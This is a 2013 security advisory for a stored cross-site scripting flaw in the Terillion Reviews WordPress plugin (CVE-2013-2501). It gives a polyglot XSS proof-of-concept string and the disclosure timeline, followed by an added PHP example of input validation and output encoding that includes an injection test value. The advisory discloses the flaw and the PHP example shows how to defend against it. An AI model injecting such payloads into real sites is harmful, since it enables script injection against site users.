packetstorm | Aditya Balapure | PACKETSTORM:120730
History: Mar 09, 2013 - 12:00 a.m.

WordPress Terillion Reviews Cross Site Scripting

2013-03-09 00:00:00
Aditya Balapure
packetstormsecurity.com
EPSS: 0.073 (Low), percentile 93.4%

`CVE Assigned - CVE-2013-2501  
  
#############################  
Exploit Title : Stored XSS in Terillion Reviews Plugin  
Author: Aditya Balapure  
home: http://adityabalapure.blogspot.in/  
Date: 08/03/13  
Software link:   
http://wordpress.org/extend/plugins/terillion-reviews/  
#############################  
  
  
The Terillion Reviews plugin for WordPress (http://wordpress.org/extend/plugins/terillion-reviews/) has a stored XSS vulnerability in the Profile Id input box.  
  
PoC Script Used:  
  
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";  
alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--  
></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>  
  
Vendor Notification  
  
20/02/2013 - Vendor notified, awaiting action  
07/03/2013 - Removed from the WordPress repository  
`
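
The two controls whose absence produces a stored XSS in a field such as the Profile Id input box are allow-list validation when the value is saved and context-specific encoding when it is rendered. The block below is an added example in plain PHP, not code from the Terillion Reviews plugin; the id format, the `profile_id` field name and the function names are assumptions made for illustration.

```php
<?php
// Added illustration; not code from the Terillion Reviews plugin.
// Assumption: a profile id is a short token of letters, digits, '-' and '_'.

// Validate on save: allow-list the expected shape instead of stripping "bad" characters.
function validate_profile_id(string $raw): ?string {
    $raw = trim($raw);
    return preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $raw) === 1 ? $raw : null;
}

// Encode on output for an HTML attribute or element body.
// In a WordPress plugin the equivalents are esc_attr() and esc_html().
function html_context(string $value): string {
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Encode on output for an inline <script> block: a JSON string literal with
// <, >, &, ' and " emitted as \uXXXX, so the value cannot close the string or the tag.
// JSON_THROW_ON_ERROR needs PHP 7.3 or later.
function js_context(string $value): string {
    return json_encode(
        $value,
        JSON_HEX_TAG | JSON_HEX_APOS | JSON_HEX_QUOT | JSON_HEX_AMP | JSON_THROW_ON_ERROR
    );
}

// Constructed samples: one well-formed id and one value carrying quotes and markup.
$samples = ['abc-12345', '\'";--></SCRIPT>"><b>x</b>'];

foreach ($samples as $raw) {
    $id = validate_profile_id($raw);
    printf("input:     %s\n", $raw);
    printf("validated: %s\n", $id === null ? '(rejected, not stored)' : $id);
    // Encoding is applied at render time even to values that passed validation,
    // so rows stored before the validator existed are still rendered inertly.
    printf("attribute: <input name=\"profile_id\" value=\"%s\">\n", html_context($raw));
    printf("script:    <script>var profileId = %s;</script>\n\n", js_context($raw));
}
```

The second sample is rejected by the validator, and both encoders emit it with every quote and angle bracket escaped for their context.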
